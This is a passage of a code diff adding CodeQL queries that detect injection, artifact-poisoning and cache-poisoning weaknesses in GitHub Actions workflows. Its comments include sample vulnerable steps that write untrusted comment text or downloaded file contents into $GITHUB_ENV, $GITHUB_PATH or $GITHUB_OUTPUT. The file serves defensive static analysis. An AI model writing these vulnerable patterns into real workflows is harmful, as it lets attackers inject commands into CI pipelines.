.regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) + else + if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) + then result = "GITHUB_WORKSPACE/" + else none() + } +} + +class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { + GHRunArtifactDownloadStep() { + // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + ( + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) + ) + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + normalizePath(trimQuotes(this.getScript() + .getACommand() + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or + result = + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) + else + if + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp()) + then result = "GITHUB_WORKSPACE/" + else none() + } +} + +class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { + DirectArtifactDownloadStep() { + // eg: + // run: | + // artifacts_url=${{ github.event.workflow_run.artifacts_url }} + // gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + // do + // IFS=$'\t' read name url <<< "$artifact" + // gh api $url > "$name.zip" + // unzip -d "$name" "$name.zip" + // done + this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and + ( + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) + ) + } + + override string getPath() { + if + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + normalizePath(trimQuotes(this.getScript() + .getACommand() + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or + result = + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) + else result = "GITHUB_WORKSPACE/" + } +} + +class ArtifactPoisoningSink extends DataFlow::Node { + UntrustedArtifactDownloadStep download; + PoisonableStep poisonable; + + ArtifactPoisoningSink() { + download.getAFollowingStep() = poisonable and + // excluding artifacts downloaded to /tmp + not download.getPath().regexpMatch("^/tmp.*") and + ( + poisonable.(Run).getScript() = this.asExpr() and + ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath()) + or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath()) + ) + or + poisonable.(UsesStep) = this.asExpr() and + ( + not poisonable instanceof LocalActionUsesStep and + download.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath()) + ) + ) + } + + string getPath() { result = download.getPath() } +} + +/** + * A taint-tracking configuration for unsafe artifacts + * that is used may lead to artifact poisoning + */ +private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(PoisonableStep step | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = step and + ( + succ.asExpr() = step.(Run).getScript() or + succ.asExpr() = step.(UsesStep) + ) + ) + or + exists(Run run | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe artifacts that is used in an insecure way. */ +module ArtifactPoisoningFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll new file mode 100644 index 000000000000..e5c5a3655101 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -0,0 +1,72 @@ +import actions + +string defaultBranchTriggerEvent() { + result = + [ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ] +} + +predicate runsOnDefaultBranch(Event e) { + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + ) + ) +} + +abstract class CacheWritingStep extends Step { + abstract string getPath(); +} + +class CacheActionUsesStep extends CacheWritingStep, UsesStep { + CacheActionUsesStep() { this.getCallee() = "actions/cache" } + + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } +} + +class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { + CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } + + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } +} + +class SetupRubyUsesStep extends CacheWritingStep, UsesStep { + SetupRubyUsesStep() { + this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and + this.getArgument("bundler-cache") = "true" + } + + override string getPath() { result = normalizePath("vendor/bundle") } +} diff --git a/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll new file mode 100644 index 000000000000..fac498f72dab --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -0,0 +1,41 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or + madSink(this, "code-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module CodeInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "code-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module CodeInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll new file mode 100644 index 000000000000..59d523cd5827 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { madSink(this, "command-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module CommandInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module CommandInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/ControlChecks.qll b/actions/ql/lib/codeql/actions/security/ControlChecks.qll new file mode 100644 index 000000000000..244c04310d6d --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/ControlChecks.qll @@ -0,0 +1,312 @@ +import actions + +string any_category() { + result = + [ + "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", + "command-injection", "argument-injection", "code-injection", "cache-poisoning", + "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou" + ] +} + +string non_toctou_category() { + result = any_category() and not result = "untrusted-checkout-toctou" +} + +string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] } + +string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() } + +string actor_is_attacker_event() { + result = + [ + // actor and attacker have to be the same + "pull_request_target", + "workflow_run", + "discussion_comment", + "discussion", + "issues", + "fork", + "watch" + ] +} + +string actor_not_attacker_event() { + result = + [ + // actor and attacker can be different + // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented + // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it + "issue_comment", + "pull_request_comment", + ] +} + +/** An If node that contains an actor, user or label check */ +abstract class ControlCheck extends AstNode { + ControlCheck() { + this instanceof If or + this instanceof Environment or + this instanceof UsesStep or + this instanceof Run + } + + predicate protects(AstNode node, Event event, string category) { + // The check dominates the step it should protect + this.dominates(node) and + // The check is effective against the event and category + this.protectsCategoryAndEvent(category, event.getName()) and + // The check can be triggered by the event + this.getATriggerEvent() = event + } + + predicate dominates(AstNode node) { + this instanceof If and + ( + node.getEnclosingStep().getIf() = this or + node.getEnclosingJob().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + ) + or + this instanceof Environment and + ( + node.getEnclosingJob().getEnvironment() = this + or + node.getEnclosingJob().getANeededJob().getEnvironment() = this + ) + or + ( + this instanceof Run or + this instanceof UsesStep + ) and + ( + this.(Step).getAFollowingStep() = node.getEnclosingStep() + or + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + ) + } + + abstract predicate protectsCategoryAndEvent(string category, string event); +} + +abstract class AssociationCheck extends ControlCheck { + // Checks if the actor is a MEMBER/OWNER the repo + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() + } +} + +abstract class ActorCheck extends ControlCheck { + // checks for a specific actor + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() + } +} + +abstract class RepositoryCheck extends ControlCheck { + // checks that the origin of the code is the same as the repository. + // for pull_requests, that means that it triggers only on local branches or repos from the same org + // - they are effective against pull requests/workflow_run since they can control where the code is coming from + // - they are not effective against issue_comment since the repository will always be the same +} + +abstract class PermissionCheck extends ControlCheck { + // checks that the actor has a specific permission level + // - they are effective against pull requests/workflow_run since they can control who can make changes + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() + } +} + +abstract class LabelCheck extends ControlCheck { + // checks if the issue/pull_request is labeled, which implies that it could have been approved + // - they dont protect against mutation attacks + override predicate protectsCategoryAndEvent(string category, string event) { + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() + } +} + +class EnvironmentCheck extends ControlCheck instanceof Environment { + // Environment checks are not effective against any mutable attacks + // they do actually protect against untrusted code execution (sha) + override predicate protectsCategoryAndEvent(string category, string event) { + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() + } +} + +abstract class CommentVsHeadDateCheck extends ControlCheck { + override predicate protectsCategoryAndEvent(string category, string event) { + // by itself, this check is not effective against any attacks + event = actor_not_attacker_event() and category = toctou_category() + } +} + +/* Specific implementations of control checks */ +class LabelIfCheck extends LabelCheck instanceof If { + string condition; + + LabelIfCheck() { + condition = normalizeExpr(this.getCondition()) and + ( + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + or + // eg: github.event.label.name == 'safe to test' + condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") + ) + } +} + +class ActorIfCheck extends ActorCheck instanceof If { + ActorIfCheck() { + // eg: github.event.pull_request.user.login == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b", + "\\bgithub\\.event\\.sender\\.login\\b" + ], _, _) + ) + or + // eg: github.actor == 'admin' + // eg: github.triggering_actor == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _) + ) and + not normalizeExpr(this.getCondition()).matches("%[bot]%") + } +} + +class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { + PullRequestTargetRepositoryIfCheck() { + // eg: github.event.pull_request.head.repo.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "pull_request_target" and category = any_category() + } +} + +class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { + WorkflowRunRepositoryIfCheck() { + // eg: github.event.workflow_run.head_repository.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "workflow_run" and category = any_category() + } +} + +class AssociationIfCheck extends AssociationCheck instanceof If { + AssociationIfCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) + normalizeExpr(this.getCondition()) + .splitAt("\n") + .regexpMatch([ + ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", + ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", + ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", + ]) + } +} + +class AssociationActionCheck extends AssociationCheck instanceof UsesStep { + AssociationActionCheck() { + this.getCallee() = "TheModdingInquisition/actions-team-membership" and + ( + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(memberships).*") + } +} + +class PermissionActionCheck extends PermissionCheck instanceof UsesStep { + PermissionActionCheck() { + this.getCallee() = "actions-cool/check-user-permission" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("require") = ["write", "admin"] + ) + or + this.getCallee() = "sushichop/action-repository-permission" and + this.getArgument("required-permission") = ["write", "admin"] + or + this.getCallee() = "prince-chrismc/check-actor-permissions-action" and + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "lannonbr/repo-permission-check-action" and + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "xt0rted/slash-command-action" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("permission-level") = ["write", "admin"] + ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*") + } +} + +class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { + BashCommentVsHeadDateCheck() { + // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + exists(string cmd1, string cmd2 | + cmd1 = this.getScript().getACommand() and + cmd2 = this.getScript().getACommand() and + not cmd1 = cmd2 and + cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and + cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") + ) + } +} diff --git a/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll new file mode 100644 index 000000000000..33efc9b1bc8f --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -0,0 +1,114 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class EnvPathInjectionSink extends DataFlow::Node { } + +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + */ +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and + this.asExpr() = run.getScript() and + step.getAFollowingStep() = run and + ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH + exists(string cmd | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) + ) + or + // cat foo.txt >> $GITHUB_PATH + run.getScript().fileToGitHubPath(_) + ) + ) + } +} + +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, string var_name | + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScript() = this.asExpr() + ) + } +} + +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 000000000000..656ea1207b51 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -0,0 +1,169 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class EnvVarInjectionSink extends DataFlow::Node { } + +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + */ +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and + this.asExpr() = run.getScript() and + step.getAFollowingStep() = run and + ( + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + or + // eg: cat test-results/.env >> $GITHUB_ENV + run.getScript().fileToGitHubEnv(_) + ) + ) + } +} + +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + + EnvVarInjectionFromCommandSink() { + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and + ( + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" + or + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") + ) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + + EnvVarInjectionFromEnvVarSink() { + exists(Run run | + run.getScript() = this.asExpr() and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and + ( + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" + or + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") + ) + ) + } +} + +/** + * Holds if a 3rd party action declares an environment variable with contents from an untrusted file. + * e.g. + *- name: Load .env file + * uses: aarcangeli/load-dotenv@v1.0.0 + * with: + * path: 'backend/new' + * filenames: | + * .env + * .env.test + * quiet: false + * if-file-not-found: error + */ +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvVarInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] + } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ +module EnvVarInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 000000000000..1d0de83afa34 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -0,0 +1,220 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery + +abstract class OutputClobberingSink extends DataFlow::Node { } + +/** + * Holds if a Run step declares a step output variable with contents from a local file. + * e.g. + * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, Step step, string field1, string field2 | + ( + step instanceof UntrustedArtifactDownloadStep + or + step instanceof SimplePRHeadCheckoutStep + ) and + step.getAFollowingStep() = run and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled + ( + // echo "sha=$(> $GITHUB_OUTPUT + exists(string cmd | + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd + ) + or + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" + ) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it in a step variable output. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT + */ +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() + ) and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + not field2 = field1 + ) + } +} + +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output 